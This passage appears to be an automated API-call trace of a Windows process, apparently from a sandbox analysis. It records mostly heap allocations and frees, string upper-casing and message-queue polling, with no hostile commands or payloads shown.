Size=0x20) returned 0x24b6a30 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0206.913] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.913] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.914] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.914] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.915] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.916] FreeLibrary (hLibModule=0x74d40000) returned 1 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.916] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.916] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.918] CloseHandle (hObject=0x1f8) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0206.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.920] CloseHandle (hObject=0x268) returned 1 [0206.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0206.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.936] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0206.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 